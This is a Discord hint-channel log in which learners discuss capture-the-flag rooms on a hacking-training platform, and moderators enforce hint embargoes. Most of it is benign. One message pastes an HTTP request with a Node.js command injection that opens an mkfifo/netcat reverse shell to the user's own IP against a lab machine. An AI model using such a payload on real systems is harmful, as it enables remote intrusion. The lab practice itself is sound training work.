#room-hints

1 messages Β· Page 88 of 1

white salmon
#

google how to automate tasks in linux

river mantle
#

Hello I'm stuck at Overpass 3, I'm now user paradox using backdoor but I'm not sure how to get flag in user james, any tips / hints? Thanks!!!vent

stuck fractal
#

Did you run linpeas?

honest panther
#

can't find .cron and the like doesn't fit

river mantle
white salmon
honest panther
mossy hazel
#

Hi, in OWASP room task 5, couldn't print out the shell with $SHELL and i can't find any other way to do so. any hints please??

urban kernel
#

hello guys can you some one give me hint in room : https://tryhackme.com/room/lunizzctfnd i have been 4 hours and i try to git something but i couldn't i just found user : runckeck mysql and password : CTF_Script ....
i tryed to connect mysql to passwrd and user and then could just what i found in databases runornot and his valu run = 0
pleas some one give hinte

stuck fractal
#

Or look in /etc/passwd using that command injection

cedar axle
late junco
#

How to see my machine ip

#

I have got the attack box ip

stuck fractal
#

Click "Start machine"

late junco
stuck fractal
#

Click the button that says Start Machine.

late junco
#

I am starting attack machine

stuck fractal
#

No.

late junco
#

It is giving an ip

stuck fractal
#

Click the button that says "Start Machine". Not "Start AttackBox".

#

Please listen.

late junco
#

Start machine is deactivated....any idea why?

stuck fractal
#

Because you already started it?

#

Refresh.

late junco
#

Okay checking out

#

Okayy thanks @stuck fractal

urban kernel
#

no one her ??

cedar axle
urban kernel
#

@cedar axle yes read above

late junco
#

Can I send a set a cookie request with a POST request or it happens only with a GET req?

stuck fractal
#

It's not a cookie request.

#

You can send a cookie with any type of HTTP request

#

You can receive a cookie from any type of http request

cyan sage
#

Hi fellows

simple mountain
#

Do not provide or ask for help or hints for the AllSignsPoint2Pwnage room until 12th April, 7pm (GMT)

cyan sage
#

I am working in Brainstorm room

cyan sage
#

I get the numbers of Port opens

#

But it Is not working in the room my answer

#

Does anyone has the same problem?

#

Real number open Port Is different from the answer expected

#

Brainstorm room

white salmon
#

what most common wordpress username ?

glacial gust
#

usually something with admin in it

stuck fractal
#

If you're asking for a hint for a thm room, the bare minimum information you should provide is room&task&question.
If it's a generic question, #infosec-general

white salmon
#

yeah i found the thing

urban kernel
#

guys what type of this : LS0tLS0gLI..

stuck fractal
#

Room, task, question.

white salmon
#

@stuck fractal | James are you the one who made Da9py Bugle room ?

stuck fractal
#

No?

white salmon
#

nvm i found an exploit on git hub

#

for the kind of vulns and the auth of that exploit is a tryhackme room maker so i though it was you

stuck fractal
#

I use my username everywhere

urban kernel
#

@stuck fractal do you have any idea for this LS0tLS0gLi0tL

stuck fractal
#

Yes

#

But you did not specify the room or task or question, or what you're already tried

#

So I am not going to answer

white salmon
#

@stuck fractal can i ask bout for a hint on the Daily Bugle priv_esc ?

urban kernel
#

@stuck fractal yes in room the flags

stuck fractal
white salmon
#

yeha www

stuck fractal
stuck fractal
white salmon
#

hmmm

urban kernel
#

i want just know type of this : LS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS

#

no One her ??

stuck fractal
glacial gust
#

most likely a cipher

stuck fractal
stuck fractal
urban kernel
cedar axle
#

Multiple encoding

white salmon
#

yo can anyone help me with the room remux the tmux

distant tartan
white salmon
#

I am working on lianyu. I'm trying to find the web directory. I tried wfuzz with 4-digits-0000-9999.txt but got nothing. Am I doing something wrong?

regal tendon
white salmon
#

thank you

humble siren
cloud perch
#

@humble siren did you root ignite yet

white salmon
#

in the glitch room, i cannot use the netcat exploit of CurlS..Please help me

#

this is the response i got back from the webserver

#

hello???

astral smelt
#

It's really blurry to see what you put

white salmon
#

ok wait

#

POST /api/items?cmd=require("child_process").exec('rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20<MY IP>%204445%20%3E%2Ftmp%2Ff') HTTP/1.1
Host: 10.10.186.126
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: token=*********************
If-None-Match: W/"a9-0aR6bAfiK/DB+A79vs3kEEVvJNc"
Connection: close

#

HTTP/1.1 502 Bad Gateway
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 10 Apr 2021 11:34:55 GMT
Content-Type: text/html
Content-Length: 584
Connection: close

<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->

stuck fractal
#

Please be calm and patient. Everyone here is a volunteer.

white salmon
#

sorry

humble siren
hollow swan
#

anyone available for a little nudge on ustoun

#

???

sullen mirage
#

Hey, I am doing Nessus room but I am getting wrong answer info even I think that's correct?

white salmon
sullen mirage
#

lol, my bad it turns out I was looking at wrong thing not the Apache HTTP server version

midnight spindle
#

Hey guys , someone have a small hint on "Theseus" room ? πŸ˜„

#

BTW I'm at the very beginning ^^ ( I didn't expect to be stuck SO FAST 😭 )

stuck fractal
#

I believe that room is no help or hints

wary viper
#

list

midnight spindle
#

@stuck fractal oh I didn't see it on the pin message

#

sorry

stuck fractal
#

Is it not in the room text?

midnight spindle
#

maybe I miss something πŸ˜„

stuck fractal
#

Not in this discord channel

midnight spindle
#

OH ok πŸ˜„ my bad !

#

got it πŸ˜‰

tiny hare
pulsar harness
#

Read through the exploit .py

little pivot
#

good day gents may I get a hint in room network services 2 Enumerating NFS task 3 question 6 as i get the file but there is nothing inside am im just doing something wrong?

tiny hare
tiny hare
pulsar harness
#

Did you try to uploading a shell to the smb share?

novel bolt
#

hi, someone to help with vulnnetDotPy please?

stuck fractal
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
simple mountain
#

Do not provide or ask for help or hints for the Sakura Room room until 14th April, 7pm (GMT)

pure thistle
#

help please stuck in room https://tryhackme.com/room/hardeningbasicspart2 task2 question2 This is a random, arbitrary number, used as the session key, that is used to encrypt GPG what are they asking for the info in the room itself google and the gpg man page all say the same thing but its not the correct answer?

wintry cloud
#

Hi all. Stuck in Investigating Windows 3.0, task #16, "This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable? (answer, answer)"

I know that the framework and variable are swapped in order. I've looked in Event Viewer, decoding payloads to see if I can't figure out how the network connections were formed. Can anyone let me know if I am headed in the right direction?

EDIT: Solved

opal vine
#

hi

#

guys i hust solved tokyo ghoul room

#

but i didn't know the answer for question 1 in the third task

#

like i got the note and extracted the information from it

#

what is the answer for that question lol

#

ok never mind i figured it out

stuck fractal
#

@light phoenix Please read the pinned messages, Rule 13 applies here

fringe bone
#

Anyone on sakura room ?

stuck fractal
proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

stuck fractal
#

As I said before.

timid sapphire
#

I am doing OWASP-Juice-Shop and when I need to reset password, security question is "Mother's maiden name?". I can't find it can someone help, I know it needs to do something with james t kirk

neat cosmos
#

trying the dogcat room now and im really stuck with the first part

#

i tried playing around with the get parameter but nothing seems to work

sand cloak
#

im totally lost

#

If you wanted to exploit a 2020 buffer overflow in the sudo program, which CVE would you use?

#

with that question

#

because when I search for "sudo program buffer overflow" only 2021 and 2019

#

omg

#

nvm

#

its the 2019 one

#

ughh that took me 30 mins

candid nimbus
white salmon
#

I need some help on the XSS part of the owasp top 10 room

#

it says add a commend and see if you're able to insert your own HTML, and I used document.write("test") and overwrote the entire site with test but didnt get a flag?

#

nvm figured it out πŸ™‚

nova helm
#

Hi All! I was flying through the new Sakura room this morning, found username, real name took ages, currency etc, but now stuck on the wallet address. Everything I've read suggests you cant just link a wallet to an email. I've tried several searches from starting point https://www.aware-online.com/osint-tools/web-archive-tools/ and I've waded through Github code but no wallet address for the attcker is jumping out at me. Any pointers much appreciated πŸ˜‰

ripe hedge
sullen mirage
#

Nvm! :)

gentle raptor
#

Im on owasptop10 room and cant find full name of Tomcat developer

#

Can anyone give me a hint what should be those 3 letters?

blazing lake
#

The

gentle raptor
#

Already tried

wintry yarrow
#

Check the developers.

ripe hedge
#

It's not the person

gentle raptor
#

Omg

#

u serious

#

haha thanks

meager dune
#

hey guuys!

#

Can u help me finishe the room "how to use try hack me"? there's this question "On your machine (right-hand side), lets list what files and folders there are. We can do this by typing "ls". What is the name of the folder you see?" i've already did that and after I wrote the name of the folders that I saw, but doesn't work. I feeling so dumb now, but I really can't resolve, please help meee

stuck fractal
meager dune
#

yeess

stuck fractal
#

Which one?

meager dune
stuck fractal
#

Which of those two buttons did you press?

meager dune
#

start machine

stuck fractal
#

!docs verify

proud scarabBOT
stuck fractal
#

Please follow these steps, then screenshot what you're seeing RN

meager dune
#

okok

stuck fractal
#

@meager dune Not there. Screenshot on tryhackme, when you run ls

meager dune
#

Aahh im sorry haha
My acess finished for today

stuck fractal
exotic glen
#

room :Advent of Cyber 2 [2020] , stuck on upload restrictions bypassing

#

any help ??

exotic glen
#

shell.php wont upload .. but shell.php.jpg will do the job , the web app only check the suffix

stuck fractal
#

-warn @restive grail Do not provide help or hints on new rooms, that room is under help and hints embargo (Rule 13).

green minnowBOT
#

⚠ Warned express#7904

restive grail
#

sorry I didn't know it was a hint

stuck fractal
#

This is the hints channel. You provided them information to help them with the room. A hint.

tiny hare
#

Hey, just a question or this is right behavior. Internal room loading with ruined template, without CSS and when I push 'Log in' I am redirected to broken http://internal.thm/blog/wp-login.php

#

ok strange looks like working for others..

#

sorry my fail: add internal.thm/blog to /etc/hosts

flint crescent
#

Gys i need help in SUID

#

can any one tell what's the wrong with that

stuck fractal
# flint crescent

You were answered in #general
Please don't ask the same question over multiple channels, although this channel was correct

flint crescent
#

ok @stuck fractal

honest tusk
#

hi guys, can you help me i am stuck at task 4 - room How websites work . i didnt find the answer about 1 hour

pure thistle
flint crescent
#

thanks for the response

digital iris
#

what are you trying as the answer currently? can you put it in spoiler tags please, also what did you search to find the cve?

spice copper
#

got it. apparently there is another way to get in via ftp

sick sierra
#

Hope everyone is doing good! I need a hint for the linux Agency room, task 3.30. I'm looking for Viktor's flag, logged via ssh as mission30. According to the link that hinted at a 'time machine', I've been trying to read .bak files and snaps that could help me, but didn't find anything useful (there's a source.bak that kinda reminded me of the source.py script in our home directory, but it doesn't seem related).
I've also noticed the .bash_history file that's redirected to /dev/null, and I've been willing to revert that link to make it print on the console again. Am I on the right track or would that be a waste of time?

stuck fractal
#

I've also noticed the .bash_history file that's redirected to /dev/null, and I've been willing to revert that link to make it print on the console again. Am I on the right track or would that be a waste of time? That's something practically all rooms will have, to hide what commands the creator ran.

sick sierra
#

thanks James. Yeah, some rooms that don't hide it make it pretty easy for us. So I'm at loss. I'll research what they refer to with a programmer's time machine (I guess it's inside the machine and not on github or something?)

sick sierra
#

Got it, was once again chasing clouds!

true widget
true widget
#

anyone want to give a nudge on linux agency. on how to proceed further.I m cureently user agent47

novel monolith
#

Got stuck in the johntheripper TASK 08 CUSTOM Rules

#

What does custom rules allows us to exploit??

#

Got the answer: Password complexity predictability πŸ’―

true widget
ripe hedge
#

You need to find the flag then

#

Generally via privesc

true widget
#

found the first 3 flags.

#

I m struck at challenge 3.4 and the hints says maybe you are too felineπŸ˜… .I cannot crack it

true widget
ashen moon
true widget
#

found it

limber sphinx
#

Sakura is still under embargo

stark pebble
#

oh ok.. still trying my best thank you

storm venture
#

has anyone done Vulnnet: Dotpy, that I could message - I was stumped on the initial enumeration for a while. I've read the writeup, and it seems quite guessy, but maybe that was just the writeup?

stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

stuck fractal
#

Not yet.

maiden rover
#

so sorry, but o i don't want answer i want hint bro

stuck fractal
# maiden rover so sorry, but o i don't want answer i want hint bro

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

#

And I'm not your bro, please don't call me bro.

maiden rover
#

Ok

white salmon
#

I could use a hint on the lab task of the room owasp top 10

#

I've managed to get the admin login to the website, but im not entirely sure where to go from here to be honest, the ssh didn't have the same user:pass

#

I'm gonna run nikto on it though

stuck fractal
white salmon
#

29

#

task 29, components with known vulnerabilities - lab

#

I tried to find some exploits on the apache version but from what I could see there wasn't anything worthwhile, just a DOS and a local thing IIRC

#

i remember reading ti was vulnerable to XSS but I'm unsure how that would help gain the /etc/passwd file

#

the hint on the room itself said to search for bookstore vulnerabilities, but that only showed sql injections etc which i already suspected from the start might be possible, but i managed to get the admin hash without injection anyway

stuck fractal
#

That's the hint on the room

white salmon
#

yeah I just remembered that exploit, I gotta try to fix it though it's giving a traceback error

stuck fractal
#

A traceback is something for developers to try and find the error, it's not a class of error

white salmon
#

yeah i know, its saying missing schema

pure thistle
#

that usually means you need to add http:// to the ip

stuck fractal
#

http://

white salmon
#

ohhhhhh yeah that would probably be it πŸ€¦β€β™‚οΈ

#

bruh moment it worked, thanks a lot!

pure thistle
#

np

stable robin
#

need some hint in sakura

#

got the name but not getting the email

#

can anyone help?

astral smelt
#

That is still under embargo

#

Hints are allowed at 7PM GMT tonight

stable robin
#

okay

pure thistle
#

nvm i give up on this room uggg

ripe hedge
#

One more hour :)

stuck fractal
wise ore
#

guys im doing lazyadmin room any hints, don't know where to start

ashen moon
#

Start the machine.

wise ore
#

lol

ashen moon
#

jk

wise ore
#

nmap shows every port closed

ashen moon
#

scan again

wise ore
#

did that

ashen moon
#

ports should be open

#

i have done this room, i dont remember how i did it

pure thistle
#

i think you need to wait 5-10 minutes for the vm to fully spin up

wise ore
#

yeah now its showing some ports

tepid quail
#

Ok can we talk about the sakura room?

stuck fractal
#

In one hour and 2 minutes

tepid quail
wise ore
#

can someone give a hint for lazyadmin room, im stuck at mysql_dump that i got from localhost/inc/

wise ore
#

yeah i got mysql_dump from there

ashen moon
wise ore
#

i don't know how to crack that hash

ashen moon
#

use john or hash cat

wise ore
#

username is admin i think

ashen moon
#

idk if it will work with crack station

stuck fractal
#

Or even crackstation if it's not salted

#

I don't think it's salted

ashen moon
#

its not salted probably,

wise ore
#

yep not salted i got it

#

i was totally overthinking it

ashen moon
ripe hedge
#

Needs more UTC

fierce stratus
#

hello =) where would i best ask a room creator about a possible ?!? easter egg ?

ripe hedge
#

Which room?

ashen moon
#

SSTI, he dmed jake on it

ripe hedge
#

Ah

#

Haven't tried that one yet

simple mountain
#

Do not provide or ask for help or hints for the Cooctus Stories room until 17th April, 7pm (GMT)

glad thunder
#

Is it okey to ask a hint for Sakura Room now ?

astral smelt
#

Yep

glad thunder
#

did u guys use wigle to find the bssid

#

or what

candid nimbus
#

Yup

glad thunder
candid nimbus
#

I think there's one nearby. Tbh, I just looked at the town and zoomed in.

glad thunder
solar topaz
#

Ah ok. πŸ‘ I took another approach and found it quite quickly. Good luck!

cobalt haven
#

Am I the only that that's struggling to find the email? I solved every other question tho πŸ™ƒ

glad thunder
hollow sparrow
#

I've solved every question ecxept the first question of HOMEBOUND

#

I cannot get the airport name right

glad thunder
#

Did u search the picture correctly

hollow sparrow
#

I try exif nothing

glad thunder
#

no need a tool

solar topaz
glad thunder
#

zoom in and zoom out is enough

hollow sparrow
#

I tried to search google for some locations where there's cherry blossom near an airport

#

Got a couple of location and a few airports.. tried their codes and nothing

solar topaz
hollow sparrow
#

There's a plane

#

Its blue and red

glad thunder
#

I can not finish the room because of BSSID question. Its sad 😦

solar topaz
hollow sparrow
glad thunder
#

but couşd not filter or sth in city to find bssid

solar topaz
hollow sparrow
#

Something that might help you.. solve the last question of the challenge then you will easily get the BSSID

glad thunder
solar topaz
cobalt haven
glad thunder
solar topaz
cobalt haven
#

the hek, i've been looking for so long and no other account pops

#

i used like a bunch of differnet tools

#

:[

hollow sparrow
#

@glad thunder then just go to wingle and search for it

#

Btw i cannot find any clue for the first question of HOMEBOUND.. either Im blind or idk

glad thunder
#

but couldnt find dk1f

hollow sparrow
#

DK1F-G

#

You have to write it exactly

#

Refresh the page .. i feel like the search is broken for wingle

#

Sometimes it doesnt work

solar topaz
glad thunder
cobalt haven
#

oh i had also found github

solar topaz
cobalt haven
#

i swear i looked at github for so long

#

and only found no-reply emails

solar topaz
#

There's a repository that contains something that will lead you to it

hollow sparrow
#

You might have better luck with the api but i havent tried it

glad thunder
#

FINALLY

#

Thnx guys for helping

hollow sparrow
glad thunder
solar topaz
#

In the cherry blossoms image

hollow sparrow
#

Looks like

#

A tower in canada

#

Or something

#

Lol

glad thunder
#

Check again πŸ™‚

hollow sparrow
#

Okay

solar topaz
#

Apart from the tower I mean.

#

Not saying it's definitely Canada

hollow sparrow
#

The tower

#

Seen that in a movie

glad thunder
#

yeah

hollow sparrow
#

I think it was spiderman

glad thunder
#

great go on

hollow sparrow
#

πŸ˜‚

glad thunder
#

xD

solar topaz
#

You're on the right track haha

hollow sparrow
#

Forgot the location need to check that scene on yt

glad thunder
#

When you found the city name. I'll say the big hint in picture xD

hollow sparrow
#

Finally

#

I got it

glad thunder
#

Congrats man

hollow sparrow
#

My geography is weak dammit

#

But dude learned so many things in this room

glad thunder
#

Dude check the right corner of the pic. And you gonna see a scrulpture

hollow sparrow
#

No matter how little the things I learned were
Makes a huge difference

hollow sparrow
#

Its so easy to ignore

glad thunder
#

teah

hollow sparrow
#

But thnks for the help

solar topaz
glad thunder
pastel beacon
#

Ya'll killed it, still impressed on how quickly some folks solved it.

hollow sparrow
#

Anyone knows a good alternate for wingle?

#

Because its truely hard to see when you search for something there

glad thunder
#

It is really hard to use that tool

stuck fractal
#

wigle works well, it works a LOT better when you're signed in.

hollow sparrow
#

When i signed in it throws errors that i had too many search query although i searched only once

#

So had to logout and use the tool like it is lol

glad thunder
#

I signed in but so slow to make searching and filtering. scrfolling down or up the map

hollow sparrow
#

I managed to solved it quickly because in my mind i already knew the city name

#

So that was easy

glad thunder
#

Even though i found the city name, finding bssid is made me crazy xD

hollow sparrow
#

If i never watched spiderman homecoming i wouldn't have been able to solve the that question i was stuck on

#

I know so little about locations in general

white salmon
#

what the syntax to crack sha512 with salt ?

#

for hashcat

stuck fractal
#

That sounds like a research question

cobalt haven
#

finally got the email, it should not have taken me that long lmao

white salmon
#

nvm got it

limber sphinx
#

I needed only 2 parameters for my wigle search to get an exact result

white salmon
#

im stuck on user priv esc on overpass3 i found root_squach in /etc/exports but no folder is mounted nor the user /home is 600 only

#

any hint could help a lot

#

or thats just a rabbit whole ?

#

hole *

stuck fractal
#

You can see it from inside the box. You couldn't see it from outside the box. You know the squash is an issue, exploit it.

swift stirrup
#

hey, i need some help getting the bssid from Sakura Room,did anyone find it?

blazing lake
#

You need to search the SSID found on the dark web site using wigle.net

swift stirrup
#

thanks!

limber sphinx
#

if you go to box author's website, you can find a lot of resources there

fallow merlin
#

anyone got any idea what to do here?

glad thunder
#

did you use any tool for searching dirs ?

fallow merlin
#

uhm no

stuck fractal
#

How'd you find server-status?

fallow merlin
#

by running gobuster and it saying 403 - /server-status

#

idk what the question is asking

stuck fractal
#

So did you use any tool for searching dirs ? - Yes, you did. You used Gobuster.

#

What else did gobuster find?

fallow merlin
#

everything else was 301 and lead me nowhere

stuck fractal
#

That's not what I asked.

fallow merlin
#

sorry

#

im fairly new

stuck fractal
#

It wasn't rhetorical, what else did gobuster find?

glad thunder
#

GoBuster must have found another dirs too

fallow merlin
#

yes /images /css /js /fonts /internal /server-status

glad thunder
#

cool

#

actually you find the answer. You only need to check them in web browser as you did before

fallow merlin
#

so what would that look like?

stuck fractal
fallow merlin
#

whats that...

glad thunder
#

Do you have any backgorund on comp sci or developing etc. Because if u dont it's gonna be hard for you

swift stirrup
#

try all of them like you tried /server-status

fallow merlin
fallow merlin
glad thunder
#

You can start with Complete Beginner path

#

This path is like from 0 to Hero

unkempt moss
#

can confirm, got me from 0 to 1/3 of a Hero

fallow merlin
glad thunder
unkempt moss
#

can someone nudge me in the right direction for the email on Sakura? i know i'm missing something obvious, but i haven't been able to figure out what since the bloody thing came out

glad thunder
#

did u find the social media accounts ?

unkempt moss
#

i believe so

#

the jobby one, the codey one, the birdy one (dodging spoilers)

glad thunder
#

xD

#

On the codey one, you need to check a specific repo

#

One repo will reveal the e-mail

swift stirrup
#

"reveal"

unkempt moss
#

i've been staring at them all ever since i got off work

#

the only one one that makes sense says it's the same as the master

swift stirrup
#

try looking into pgp

unkempt moss
#

that's me pointed in the right direction

#

much appreciated

swift stirrup
#

np πŸ™‚

hexed crescent
#

Please check the pinned messages in this channel. πŸ™‚

thorn heart
#

Ooooh sorry

stable robin
#

can I get hint for Sakura ??

limber sphinx
#

yes

stable robin
#

where will I find bssid in sakura??

#

and where to search for email address of sakura?

#

@limber sphinx

limber sphinx
#

email - one of the social accounts is linked to it

#

bssid - wigle

stable robin
#

@limber sphinx what about the home ?

stable robin
limber sphinx
#

google it and you'll find out, it's an OSINT room

limber sphinx
#

home city?

#

it's also wifi-related

stable robin
pastel beacon
stable robin
#

done bruh thanks a lot I got the flag

#

thanks @pastel beacon @limber sphinx

#

mine only one left in sakura and it's email address @pastel beacon @limber sphinx can you please help me ??

#

please

pastel beacon
stable robin
pastel beacon
#

Are there any repos that look like they might be relevant?

stable robin
stable robin
stable robin
pastel beacon
#

The email is not going to be in plain text

stable robin
pastel beacon
#

Research a bit on some of the repo names and that should help out

stable robin
#

okay

#

@pastel beacon please give some more hints please

pastel beacon
#

Did you look up some of the repo names?

stable robin
#

??

pastel beacon
#

Nope

#

One of the repos is related to encryption

#

To encrypt messages in this method you need keys to prove who you are

stable robin
#

yeah I think it's public keys, is it??

pastel beacon
#

Yes

stable robin
#

yeah I opened that file but don't know how to decrypt it

pastel beacon
#

There's a few different ways it can be done. There is a Youtube video (same channel name as the name of the THM room owner) showing how to decrypt it using Linux

#

There is also stand alone tools that work with that type of encryption

stable robin
#

could icyberchef be used to decrypt it??

pastel beacon
#

Yes

stable robin
#

okay but where will I get the private key??

pastel beacon
#

You do not need the private key, only the public one

stable robin
pastel beacon
#

It is in one of the repos

stable robin
#

in the same or different repo ??

pastel beacon
#

It is in a repo owned by the account you identified already

stable robin
#

@pastel beacon I am getting this when I give that key into the input

pastel beacon
#

In cyber chef?

stable robin
#

@pastel beacon no idea not getting anything

#

please help

pastel beacon
#

I'm not getting it in CyberChef but I don't recall the recipe that others used, I use the linux method

stable robin
#

okay so please send the link of that video which you were recommending

#

@pastel beacon tell me one thing I got the key and now it is asking for encrypted message, so from where will I get the message

pastel beacon
#

There is no message to decrypt

#

Information that is given when a key is created can be extracted from the public key

stable robin
#

okay let me check

#

just send me the video

#

okay got it

#

thanks bruh

#

done I have completed the Sakura Room Successfully, Thanks buddies @pastel beacon @limber sphinx thank you so much for your love and support

#

I want to apply for the badge so what should I give in the url field ??

limber sphinx
#

Note: You may only request this special THM badge if you have already obtained at least the OSINT Dojo Student level first.

stable robin
silver otter
#

use your osint skills towork it out!

pastel beacon
tepid quail
#

On the Sakura room I'm having trouble with the URL from which passwords and SSIDs were saved and with the starting airport. Hints would be appreciated

candid nimbus
#

1st one - there's a hint on the page which is as good as anything. 2nd one, look for any landmarks and zone in on it.

candid nimbus
#

πŸ‘

tepid quail
#

But the URL of deep paste is covered in the image hint and the site isn't accessible atm

ripe hedge
#

the site is only accessible via tor, but I haven't been able to get it working. the screenshot has enough info though

tepid quail
#

Oohh I got it now

ripe hedge
#

then it was oh, that's ||***********||

candid nimbus
ripe hedge
#

I only know one airport in that city so

candid nimbus
#

There are 2. I don't think she left from the answer as that only does domestic flights, but it is the closest

ripe hedge
#

ah yeah good point

late patio
#

any hint on how to get the current twitter handle? smh

ripe hedge
#

search harder

solar topaz
candid nimbus
candid barn
#

I am at Owasp Top 10, task 19, question 2. I cannot find the hidden credentials. Can someone give me a hint?

candid barn
#

I mean those

#

Can you give me a hint where I can find those?

midnight anchor
#

You have to google it, check your website and check what you could google and then put "default credentials" at the end

cedar axle
candid barn
late patio
candid barn
#

I found it in GitHub

#

Is there an option to find it in the source code?

cedar axle
#

just read the docs

candid barn
#

What are the docs?

cedar axle
#

documentation

candid barn
#

Where can I find those in the source code?

cedar axle
candid barn
#

Aaaaah

#

So the hint means that I have to go to GitHub

cedar axle
#

yeah, I think so

shy adder
#

Hi all. sup?

median grove
#

anyone available for some nudges ?

wintry yarrow
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.
eternal totem
#

Worth noting this is looking a the pcap dns+icmp.pcapng

median grove
#

Actually in the SakuraRoom, I enumerated the attacker user name and also found some possible email ids and his name in the organization, But i cant find the exact correct email of the attacker

#

so i require some nudges in this room

solar topaz
median grove
#

I have found linkedin and github accounts

solar topaz
tender shuttle
median grove
wheat helm
#

Try linpeas

stuck fractal
#

Yeah, like Alex said, try linpeas.

tepid quail
white salmon
#

Hey how can I pass this step from Vuneversity, Im with gobuster trying to make a research of Web directories and I cant due to funcionallity of that command

As you can see in the url https:// is replied twice
but when i run the command I cant do it if I dont put the ip from the target with http://
Any posible solution to this?

thorn heart
white salmon
#

I cant do it in another way?

#

If i run the command like that it doesnt works

astral smelt
#

put http:// before the ip

thorn heart
white salmon
#

okey, it doesnt works

#

look

zealous pilot
white salmon
#

all the problems was that

#

im a little bit idiot

restive grail
#

I'm doing CooctusVMv2 and I'm stuck on the Szymex flag, I found Paradox but now I don't know what to do.

fallow viper
#

Is there a way to filter by Opcode in wireshark?

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

stuck fractal
#

This is the second time I've had to remind you about the 72 hour rule @restive grail

restive grail
#

Sorry @stuck fractal I didn't know about that, my fault I don't read carefully this rule.

stuck fractal
#

Seeing as you were previously warned over it, I doubt that.

snow arch
#

Hi guys, in the Sakura room, Taunt section, where should I look for the Twitter handle?

solar topaz
snow arch
#

Thank you for helping, by the way πŸ™‚

limber sphinx
#

It's very obvious

snow arch
glacial gust
#

try a general search for the username

snow arch
#

I knew it would be obvious when I got it! Thanks guys πŸ™‚

ripe hedge
#

twitter has a search feature πŸ˜‰

snow arch
ripe hedge
#

a lot of that room is though

glacial gust
#

hydra, what did you use to find the email

ripe hedge
#

what did you find so far?

#

you may DM if you wish

snow arch
#

I haven't done that room (or used wfuzz enough to say), but are you certain the IP is correct? The error message would suggest it's something to do with the network.

glacial gust
ripe hedge
#

gj

stuck fractal
#

Start from 0

#

And numbers

#

Not words

#

Yeah

#

Well, no, but yes

#

It's meant to be numbers, right? It's IDOR, you're fuzzing IDs for the notes?

#

Huh ok, I'm thinking of a different question

#

NGL I'd use a username wordlist for usernames

ripe hedge
#

you mean we can't use rockyou for everything?

glacial gust
zealous raptor
#

guys, can someone pls help me in the ssti room?
it's a quick help, I'm trying to execute the whoami command

#

but it returns 500 internal server error

dusky vigil
#

Note: Jinja2 is essentially a sub language of Python that doesn't integrate the import statement, which is why the above does not work.

#

Continue reading the section from the room and you'll see the difference in payload required to exploit it πŸ™‚

zealous raptor
#

ohh thx

#

now it worked

#

thank you so much @dusky vigil

harsh drum
#

Hi. I am doing the Network Services module and would like a hint please. I am on Task 6, Enumerating Telnet, and I have tried doing this twice with the -p- flag and each time it has gone over an hour and the machine loses connection. I know I am doing it right because I get the 0 ports open when I run nmap without the -p- flag (which I did first). So the hint is, please can you give me a broad range for nmap to check so I can complete the question. (eg ports xxx - yyy). Thank you for your help

sleek hazel
#

any hints on Cooctus Stories?

limber sphinx
#

embargo on Cooctus till 17th

sleek hazel
#

Oh! Just checked. Thanks.

median grove
#

need some hints on finding the attacker's twitter handle on the SAKURA room

#

the right user seems to have no account on the twitter handle

#

i have no idea where to look 😢

limber sphinx
#

search for the handle

iron shadow
#

